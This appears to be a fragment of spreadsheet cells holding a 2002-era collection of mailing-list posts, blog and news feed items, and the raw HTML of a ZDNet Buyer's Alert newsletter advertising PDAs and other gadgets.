 OK, but only if you also meant religious and alcoholic extremes ;)
 When the political canvassers come to my door during the campaigns,
 I always wonder why cigarette packages are labelled with warnings
 whereas political brochures are not; the statistics clearly show
 which is the greater, more senseless, and more preventable killer.
 &gt;&gt;&gt;&gt;&gt; "R" == Russell Turpin &lt;deafbox@hotmail.com&gt; writes:
     R&gt; It's difficult to measure which is the greater liability in a
     R&gt; potential mate, religiosity or alcoholism.
     G&gt; Or politics.
 -- 
 Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
  - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
   "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Conversations From GDC Europe: Mark Cerny, Jonty Barnes, Jason
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8613665,159/
 Date: 2002-10-06T18:12:55+01:00
 In the first of a two-part series of interviews from the GDC Europe, we talk 
 with Mark Cerny about game preproduction, Jonty Barnes about camera control, 
 and Jason Kingsley about ratings and censorship.
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Aug 09, 2002 at 08:07:33PM +0200, Paul Linehan wrote:
 &gt; Is there any way that the mailing list can be 
 &gt; turned into newsgroup?
 yep, mail to news gateways are common.
 http://www.tldp.org/HOWTO/mini/Mail2News.html
 -- 
 colmmacc@redbrick.dcu.ie        PubKey: colmmacc+pgp@redbrick.dcu.ie  
 Web:                                 http://devnull.redbrick.dcu.ie/ 
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt; Thanks, Tabor.  How do I install v1 over v2, and where does one
 &gt;&gt; get it?  (I don't see it at razor.sourceforge.net)
 &gt;
 &gt;It's there. Scroll down on the downloads page. However you might
 &gt;consider going the other way and installing SpamAssassin's 2.40
 &gt;bleeding-edge code as Razor v2 has a lot of nice features over v1.
 Hmmm... installed SA 2.40, but I get the same error when trying
 to launch amavisd-new (can't find Razor/Client.pm).  Seems like
 the amavis code is calling for this.  I'll hit up the
 amavis-users list.  (Feel free to fire off the answer if you
 have it, though!   :)
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, Aug 01, 2002 at 04:03:07PM +0100, Padraig Brady mentioned:
 &gt; Some local Irish wildlife
 &gt; 
 &gt; http://www.iol.ie/~padraiga/pics/wild1.jpg
 &gt; http://www.iol.ie/~padraiga/pics/wild2.jpg
 &gt; 
 &gt; was I bored or what?
  Most likely.
  Hey...is that one of my nice wai-yip stuffed ones ?
 Kate
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RIAA site hacked overnight
</t>
  </si>
  <si>
    <t xml:space="preserve">First seen on Dave Winer's Scrpiting News (www.scripting.com) Details here:
 http://www.digichapman.com/index.php?permalink=67
 - Jim
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Six
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/09.html#six
 Date: 2002-10-09T19:54:41-05:00
 Actually, 5.6. I clocked my &amp;#8220;long loop&amp;#8221; today and discovered that 
 the run I thought was 6 miles is actually only 5.6. And the &amp;#8220;short 
 loop&amp;#8221; I thought was 5 miles is actually only 4.6. I have an off-by-0.4 
 bug. This is very upsetting. I've lost 0.4 miles somewhere. If anyone finds 
 them, can you please let me know? Thank you. 
 I ran 9 miles last week, and 10 so far this week, even taking into account my 
 off-by-0.4 bug. I fear I am turning into a runner. My father and I made fun of 
 runners when I was growing up. He used to say that you never saw a runner 
 smiling. We'd drive by runners, point at them, and say, &amp;#8220;Look, another 
 runner... not smiling!&amp;#8221; This weighed heavily on my psyche in my formative 
 years. So it is with some measure of shame that I admit that I am becoming a 
 runner. 
 Becoming a runner is actually not that difficult. Not surprisingly, it involves 
 running. There's other stuff, too, eventually, but running is the important 
 part. If you can run a mile, run a mile. If you can only run around the block, 
 run around the block. Tomorrow you'll run around the block, and the next day 
 you'll find you can run around two blocks. And next week you'll find you can 
 run a mile. Then one day you'll run a mile, then stop to catch your breath, 
 then get invigorated and run another mile. 
 And then you're a runner. That's it, really. It's not complicated. You run, and 
 you run, and you run. And one day, you discover that shoes are important, and 
 that the old sneakers you threw on the first time you tried out this running 
 thing out aren't actually very good for running. So you go buy new shoes, and 
 you run, and you run, and you run. And later, you discover that stretching is 
 important too, so you stretch and run, and stretch and run, and stretch and 
 run. 
 There's other stuff too, but it doesn't really matter until you're already a 
 runner. You learn about differences in running surfaces. And how many miles you 
 should really put on one pair of shoes. And when in the day you should run to 
 maximize calorie burning. And how to train for a marathon, and so forth. Don't 
 worry about any of that now. Just run. Running is key. Otherwise you're just 
 another fat schmuck lying on the couch reading _Runner's World_.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Reclaiming privacy with laser-pointers
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85537483
 Date: Not supplied
 Here's a how-to explaining how to blind a surveillance camera a laser-pointer. 
 Link[1] Discuss[2] (_Thanks, Mike[3]!_)
 [1] http://www.naimark.net/projects/zap/howto.html
 [2] http://www.quicktopic.com/boing/H/MMYu4tp9w54
 [3] http://www.objectif.org
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, 24 Aug 2002, Adam L. Beberg wrote:
 --]And yet STILL noone is out there creating _public domain_ content. Is there
 --]even one person out there can can even begin to talk without being a
 --]complete hypocrite? And no the "open source" people cant talk either, the
 --]GPL aint even close. I know I cant talk.
 All my music is in the Public Domain.
 There are others.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Buyer's Alert | July 18, 2002&lt;/TITLE&gt;
 &lt;/HEAD&gt;
 &lt;body style="margin:8px 9px 9px 12px" bgcolor="#ffffff" background="http://techupdate.zdnet.com/techupdate/i/bg_232850.gif" link="#003399" alink="#cc0000" vlink="#666699"&gt; 
 &lt;CENTER&gt;&lt;A name=top&gt;&lt;/A&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=612 bgColor=#232850 border=0&gt;
   &lt;TBODY&gt;
   &lt;TR vAlign=bottom&gt;
     &lt;TD width=440 colSpan=4&gt;&lt;IMG height=60 alt="ZDNet Buyers Alert Newsletter" 
       src="http://www.cnet.com/i/sh/nl/hd_buyers_alert.gif" width=440&gt;&lt;/TD&gt;
     &lt;TD vAlign=top align=middle width=160 bgColor=#ffffff rowSpan=2&gt;&lt;!-- ad --&gt;
 &lt;div align="center"&gt;&lt;img src="http://i.i.com.com/cnwk.1d/Ads/common/advertisement.gif" width="120" height="10" border="0"&gt;&lt;/br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=fc-WpHmQVwTauRU4pZa9-0t3VVat9yR" target="new"&gt;   
 &lt;img src="http://www.techrepublic.com/images/ads/Toshiba.sky.2400freebag_160x600.gif" width="160" height="600" border="0"&gt;
 &lt;/a&gt;&lt;/div&gt;
 &lt;!-- /ad --&gt;&lt;!-- rebates --&gt;
 &lt;br&gt;&lt;img src="http://www.cnet.com/i/nl/zd-ba/rebates.gif" width=160 height=18 alt="Rebates"&gt;&lt;br&gt;
 &lt;table width=160 bgcolor="#eeeeee" cellpadding=5 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-2"&gt;When ordering, make sure the reseller/manufacturer 
 provides the rebate coupon you need.
 &lt;br&gt;&lt;br&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;font face="arial, helvetica" size="-2"&gt;Expires July 31, 2002&lt;br&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=11-l8riI2-aPLZhppqX3VynhNBuCqlR" &gt;Get a car cassette adapter and power adapter FREE with Rio Volt SP250&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;font face="arial, helvetica" size="-2"&gt;Expires August 31, 2002&lt;br&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=27-z9ZmIqI14RundZFSkMRUVolYrBeR" &gt;$20 off SideWinder Strategic Commander&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;font face="arial, helvetica" size="-2"&gt;Expires September 30, 2002&lt;br&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=3c-tK4RIcIw_GwZ-o1Y0VXXjhrHNHyR" &gt;$20 off Rio 600 64MB&lt;/a&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=51-QgUWIjJWhgT2xbBJlh9GpMUHM3FR" &gt;$20 off Nike PSA (120)&lt;/a&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=66-kDH_IyWzTR_oSqmsPj9y-DzbW-9R" &gt;$20 off RioVolt SP90&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;&lt;font face="arial, helvetica" size="-2"&gt;Expires March 3, 2003&lt;br&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=7b-prT_IBZzgRkymTxbDr4q1O7VpJcR" &gt;$10 off Microsoft Natural Keyboard Pro PS2/USB&lt;/a&gt;&lt;br&gt;
 &lt;br&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;&lt;!-- top 5 --&gt;&lt;IMG 
       height=18 alt="ZDNet Top 5 Products" src="http://www.cnet.com/i/sh/nl/top5.gif" 
       width=160&gt;&lt;BR&gt;
       &lt;TABLE cellSpacing=2 cellPadding=0 width=160 bgColor=#eeeeee border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD colSpan=4&gt;&lt;!--&lt;IMG height=3 src="http://www.cnet.com/i/sh/nl/b.gif" 
             width=1&gt;&lt;BR&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&amp;nbsp; &lt;IMG alt="" 
             src="e50520011112_files/rhc_digitalcameras.gif" border=0&gt;--&gt; &lt;b&gt;&lt;FONT face="arial, helvetica" size=-1&gt;Digital Cameras&lt;/font&gt;&lt;/b&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR vAlign=top&gt;
           &lt;TD rowSpan=5&gt;&amp;nbsp;&amp;nbsp;&lt;/TD&gt;
           &lt;TD width=15&gt;&lt;FONT face="arial, helvetica" 
           size=-1&gt;&lt;B&gt;1.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
  &lt;a href="http://clickthru.online.com/Click?q=90-wHZMQ_IMRhNOiekVb8HYULuonXiR" &gt;&lt;B&gt;PowerShot G2&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;&lt;FONT color=#333333 size=-2&gt;Premier merchant:&lt;BR&gt;
 		&lt;a href="http://clickthru.online.com/Click?q=a5-DyaHQ7ZFS_MhrGLsIC1b2OB8OEPR" &gt;PC Connection $799&lt;/A&gt;&lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD rowSpan=5&gt;&amp;nbsp;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR vAlign=top&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;2.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 		  &lt;a href="http://clickthru.online.com/Click?q=ba-m-45QXpJTWS-ckfxhOmI_uIUEknR" &gt;&lt;B&gt;PowerShot S30&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;&lt;FONT color=#333333 size=-2&gt;Premier 
             merchant:&lt;BR&gt;&lt;a href="http://clickthru.online.com/Click?q=cf-ebM-QLw1uw1KdThJaylIO7r3fxeR" &gt;PC Connection $499&lt;/A&gt;&lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR vAlign=top&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;3.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 		  &lt;a href="http://clickthru.online.com/Click?q=e4-ABYFQVkP4jD75LjI81u0PT_Qv1yR" &gt;&lt;B&gt;PowerShot S40&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;&lt;FONT color=#333333 size=-2&gt;Premier merchant:&lt;BR&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=fa-FmqNQhO1bO0ZZqstvDA4oSMpoLnR" &gt;CDW $599&lt;/A&gt;&lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR vAlign=top&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;4.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 		  &lt;a href="http://clickthru.online.com/Click?q=0f-RM2lIqjD91PMkvesUb9HGRJ1bfeR" &gt;&lt;B&gt;PowerShot A40&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;&lt;!--&lt;FONT color=#333333 
             size=-2&gt;Premier merchant:&lt;BR&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=24-8DdMIczi7pYqCqCgeUef92iqrwyR" &gt;CDW $499&lt;/A&gt;&lt;BR&gt;--&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR vAlign=top&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;5.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 		  &lt;a href="http://clickthru.online.com/Click?q=39-7QgMIjIiVpfFTUVCGLs-y39w-_lR" &gt;&lt;B&gt;Cyber Shot DSC-F707&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;&lt;FONT color=#333333 
             size=-2&gt;Premier merchant:&lt;BR&gt;&lt;a href="http://clickthru.online.com/Click?q=4e-0Y95InZ3aFwu66zIKlsTn8N_Jj9R" &gt;Gateway $445&lt;/A&gt; &lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD colSpan=3&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=63-tPKjIHWGwVTjVf_g_9-hwkp_WEcR" &gt;More Top 
             Selling Products...&lt;/A&gt;&lt;/B&gt;&lt;/B&gt;&lt;BR&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;
     &lt;TD vAlign=bottom width=12 colSpan=3&gt;&lt;IMG height=6 
       src="http://www.cnet.com/i/sh/nl/gl_corner2.gif" width=12&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;!-- intro --&gt;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width=428 bgColor=#ffffff&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 width=428 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR vAlign=top&gt;
           &lt;TD width=10&gt;&lt;IMG height=1 src="http://www.cnet.com/i/sh/nl/b.gif" 
           width=10&gt;&lt;/TD&gt;
           &lt;TD width=410&gt;&lt;BR&gt;
             &lt;TABLE cellSpacing=0 cellPadding=0 width=410 border=0&gt;
               &lt;TBODY&gt;
               &lt;TR vAlign=top&gt;
                 &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;FONT color=#333333 
                   size=2&gt;&lt;B&gt;Dear Reader,&lt;BR&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;
 Basic electronic organizers they're not, but if you're searching 
 for a pocket-sized computer for music, movies, and games, then 
 these PDAs are well worth a look. All four models feature fast 
 processors, large amounts of RAM, and sharp, color screens, which 
 make them better choices for rich media than competing products. 
 But beyond those basics, these handhelds are very different. You'll 
 find three different operating systems: Pocket PC, Palm, and Linux. 
 Two have keyboards, one has a built-in Bluetooth radio, and all 
 four support various expansion card formats. Most Pocket PCs are 
 multimedia friendly; we've picked two that really stand out because 
 of features or price. However, none of these are inexpensive models, 
 so check out our hands-on reviews to find the high-end handheld 
 that you'll be happiest with. 
 &lt;P&gt;
 &lt;table&gt;
 	&lt;TR&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://zdnetshopper.cnet.com/i/co/ps/120/8751975_120_1.gif"&gt;
 		&lt;/TD&gt;
 		&lt;TD&gt;&lt;FONT color=#990000 size=-1&gt;
 &lt;a href="http://clickthru.online.com/Click?q=78-d5asIdUkHpvIL5i5vnMUN5xspoRR" &gt;&lt;B&gt;Audiovox Maestro PDA-1032&lt;/b&gt;&lt;/a&gt;
 &lt;LI&gt;Lowest price: $330
 		&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://zdnetshopper.cnet.com/i/co/ps/120/7344382_120_1.gif"&gt;
 		&lt;/TD&gt;
 		&lt;TD&gt;&lt;FONT color=#990000 size=-1&gt;
 &lt;a href="http://clickthru.online.com/Click?q=8d-nbL1Q7nmvy6HOUkIiSupcptbPMPR" &gt;&lt;B&gt;Compaq iPaq H3870&lt;/b&gt;&lt;/a&gt;
 &lt;LI&gt;Lowest price: $545
 	&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://zdnetshopper.cnet.com/i/co/ps/120/8407129_120_1.gif"&gt;
 		&lt;/TD&gt;
 		&lt;TD&gt;
 &lt;FONT color=#990000 size=-1&gt;
 &lt;a href="http://clickthru.online.com/Click?q=a2-6-M7QXZHFgN_bAI9R0CGk_HtsonR" &gt;&lt;B&gt;Sharp Zaurus SL-5500&lt;/b&gt;&lt;/a&gt;
 &lt;li&gt;Lowest price: $367
 	&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://zdnetshopper.cnet.com/i/co/ps/120/9062023_120_1.gif"&gt;
 		&lt;/TD&gt;
 		&lt;TD&gt;&lt;FONT color=#990000 size=-1&gt;
 &lt;a href="http://clickthru.online.com/Click?q=b8-smr2QQUsXVL_HIolq9S_p8qkEiiR" &gt;&lt;B&gt;Sony CLIE PEG-NR70V&lt;/b&gt;&lt;/a&gt;
 &lt;LI&gt;Lowest price: $517
 &lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;/table&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;
           &lt;TD width=8&gt;&lt;IMG height=1 src="http://www.cnet.com/i/sh/nl/b.gif" 
         width=8&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;!-- new products--&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 width=420 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD colSpan=3&gt;&lt;IMG height=30 alt="Feature: New Products" 
             src="http://www.cnet.com/i/sh/nl/sub_new.gif" width=395&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=10&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD width=100&gt;&lt;a href="http://clickthru.online.com/Click?q=cd-VHhSQzsJFTDFtiDFjAi_TOlRfXPR" &gt;&lt;IMG height=100 src="http://www.zdnet.com/products/graphics/pid/561861.jpg" width=130 border=0&gt;&lt;/A&gt;&lt;/TD&gt;
           &lt;TD width=10&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD width=300&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 		  &lt;a href="http://clickthru.online.com/Click?q=e2-J1OpQhyI69x7KDbENBEZdihv9KnR" &gt;&lt;B&gt;Sony CLIE PEG-T665C&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;With the CLIE PEG-T665C, Sony took everything good about the 
 PEG-T615C--including its terrific color screen and solid 
 design--and added a faster processor and MP3 support to make 
 quite an attractive Palm OS PDA.&lt;BR&gt;&lt;a href="http://clickthru.online.com/Click?q=f7-N0QnQLgImYMFjfjlrZIGiR6ImOeR" &gt;&lt;FONT 
             color=#990000 size=-2&gt;Read Review&lt;/FONT&gt;&lt;/A&gt; &lt;FONT color=#990000 
             size=-2&gt;|&lt;/FONT&gt; &lt;a href="http://clickthru.online.com/Click?q=0c-_Y3DIc8xF7xrJahWDjP2qJ13b4yR" &gt;&lt;FONT color=#990000 size=-2&gt;Check Prices&lt;/FONT&gt;&lt;/A&gt; &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD colSpan=4&gt;&amp;nbsp;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=10&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD width=100&gt;&lt;a href="http://clickthru.online.com/Click?q=21-UPROIjdkyuROSf-oQqYoj1cTQ4lR" &gt;&lt;IMG height=100 hspace=10 src="http://www.zdnet.com/products/graphics/pid/561145.jpg" width=130 
             border=0&gt;&lt;/A&gt;&lt;/TD&gt;
           &lt;TD width=10&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD width=300&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 		  &lt;a href="http://clickthru.online.com/Click?q=36-wg7-IiIamXDQeEtMxvH3QainXQ4R" &gt;&lt;B&gt;TDK Electronics MOJO 620&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;If you're the type who really likes to categorize and catalog 
 your music, this MP3 CD player has everything that you need, 
 plus a few never-before-seen extras.&lt;BR&gt;
 			&lt;a href="http://clickthru.online.com/Click?q=4b-k_l7IBUWWWf-AstP9VA35c54JMcR" &gt;&lt;FONT 
             color=#990000 size=-2&gt;Read Review&lt;/FONT&gt;&lt;/A&gt; &lt;FONT color=#990000 
             size=-2&gt;|&lt;/FONT&gt; &lt;a href="http://clickthru.online.com/Click?q=60-oqItIsE3hT060YOLN8S_eSgFWVRR" &gt;&lt;FONT color=#990000 size=-2&gt;Check Prices&lt;/FONT&gt;&lt;/A&gt; 
       &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;!-- ad --&gt;&lt;BR&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 width=395 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD width=10&gt;&lt;IMG height=1 src="http://www.cnet.com/i/sh/nl/b.gif" 
           width=10&gt;&lt;/TD&gt;
           &lt;TD width=385 bgColor=#c0c0c0&gt;&lt;IMG height=1 
             src="http://www.cnet.com/i/sh/nl/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;FONT 
       face="arial, helvetica" size=-1&gt;&lt;BR&gt;&lt;/FONT&gt;
       &lt;CENTER&gt;&lt;IMG height=10 alt=Advertisement 
       src="http://www.cnet.com/i/sh/nl/ad10-dk.gif" width=120&gt;&lt;/CENTER&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD colSpan=3&gt;&lt;IMG height=5 src="http://www.cnet.com/i/sh/nl/b.gif" 
           width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD colSpan=3&gt;&lt;IMG height=5 src="http://www.cnet.com/i/sh/nl/b.gif" 
           width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR vAlign=center&gt;
           &lt;TD&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD align=right width=75&gt;&lt;IMG alt="" hspace=15 
             src="http://www.cnet.com/i/sh/nl/5455_zdnet_image.jpg" align=middle 
           order="0"&gt;&lt;br&gt;&lt;br&gt;&lt;/TD&gt;
 		  &lt;TD vAlign=top width=300&gt;&lt;FONT face="verdana, helvetica" 
             size=-2&gt;&lt;BR&gt;
 &lt;a href="http://clickthru.online.com/Click?q=76-vJf7InBWAWiI7Tc1okYP2r70U69R" &gt;FREE PDA or Printer with select systems!&lt;/A&gt;&lt;br&gt;
 Buy select Dell systems and choose a Palm PDA or an Epson printer 
 FREE (shipping extra), PLUS save up to $300! Limited time offer. 
 Small Business only. Click for details.&lt;br&gt;&lt;/td&gt;
   &lt;TR vAlign=center&gt;
           &lt;TD&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD align=right width=75&gt;&lt;IMG alt="" hspace=15 
             src="http://www.cnet.com/i/sh/nl/84x74_systems.gif" align=middle 
           order="0"&gt;&lt;br&gt;&lt;br&gt;&lt;/TD&gt;
 		  &lt;TD vAlign=top width=300&gt;&lt;FONT face="verdana, helvetica" 
             size=-2&gt;&lt;BR&gt;
 			&lt;a href="http://clickthru.online.com/Click?q=8b-SBGBQY0VloNH6YvEYIEElDh4B1rR" &gt;A friendly reminder from Dell Home Systems&lt;/A&gt;&lt;br&gt;Buy a select new Dell Home System and get your Memory Upgraded 
 for free. Hurry! Offer ends soon.&lt;br&gt;&lt;/td&gt; 		  
 &lt;!--&lt;tr valign=middle&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td width=75 align=right&gt;&lt;img src="http://www.cnet.com/i/sh/nl/hp_inks2.jpg" width="98" height="82" border="0" hspace="20" align="bottom" alt=""&gt;&lt;/td&gt;
 &lt;td width=300 height="50" valign="top"&gt;&lt;font face="verdana, helvetica" size="-2"&gt;&lt;BR&gt;
 Canon inkjet cartridges start at $2.00!&lt;BR&gt;
 Epson inkjet cartridges start at $4.00!&lt;BR&gt;
 HP inkjet cartridges start at $15.00!&lt;BR&gt;
 Toners start at just $17.00!&lt;BR&gt;
 &lt;a href="http://clickthru.online.com/Click?q=a0-11h8QQB7cN5ksDRUByjw2PB1s7iR" &gt;http://www.voltexx.com&lt;/a&gt;
 &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;--&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;!-- steals and deals --&gt;&lt;BR&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 width=420 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD width=10&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD width=410&gt;&lt;IMG height=30 alt="Steals and Deals" 
             src="http://www.cnet.com/i/sh/nl/sub_steals.gif" width=395&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;FONT size=-2&gt;Please note 
             that prices fluctuate and may have changed since the sending of this 
             newsletter. Lowest prices listed are usually after rebates (but 
             please check with the reseller, sometimes the rebate is included in 
             their price). &lt;BR&gt;&lt;/FONT&gt;
             &lt;P&gt;&lt;B&gt;Handspring Treo 270&lt;/B&gt;&lt;BR&gt;Price recently dropped 29%&lt;BR&gt;
 			&lt;a href="http://clickthru.online.com/Click?q=b5-50FcQ7Uq5NZWZfP1PHq15ZNEEZPR" &gt;
 			Lowest price: $499&lt;/A&gt; 
             &lt;P&gt;&lt;B&gt;HP PhotoSmart 912XI&lt;/B&gt;&lt;BR&gt;Price recently dropped 40%&lt;BR&gt;
 			&lt;a href="http://clickthru.online.com/Click?q=ca-iciuQUgTC1LryhXcl8jfOfRHHUnR" &gt;
 			Lowest price: $299&lt;/A&gt;&lt;BR&gt;
             &lt;P&gt;&lt;B&gt;JVC XV-S502SL&lt;/B&gt;&lt;BR&gt;Price recently dropped 45%&lt;br&gt;
 			&lt;a href="http://clickthru.online.com/Click?q=df-1kJhQLETx263W9ofbQq-Kh1XhaeR" &gt;
 			Lowest price: $137&lt;font face="Arial"&gt;&lt;/A&gt; &lt;BR&gt;&lt;br&gt;
 			&lt;BR&gt;&lt;BR&gt;&lt;U&gt;&lt;B&gt;SPECIAL FEATURE&lt;/B&gt;&lt;/U&gt;&lt;BR&gt;&lt;br&gt;Did you know that ChannelOnline's StoreSite enables you to set up
 a private storefront with your company name and logo in less than
 an hour?
 &lt;P&gt;
 Your customers can view quotes you have created for them, search 
 the product database, build their own quotes based on the pricing 
 you've predetermined for them, and place orders with you online, 24/7.
 &lt;P&gt;
 Sign up now to give your customers a whole new level of service.
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=f4-Y-XEQ0sDS-fS1K7uUJ5QddfWmTyR" &gt;&lt;B&gt;Tell me more about ChannelOnline.&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;
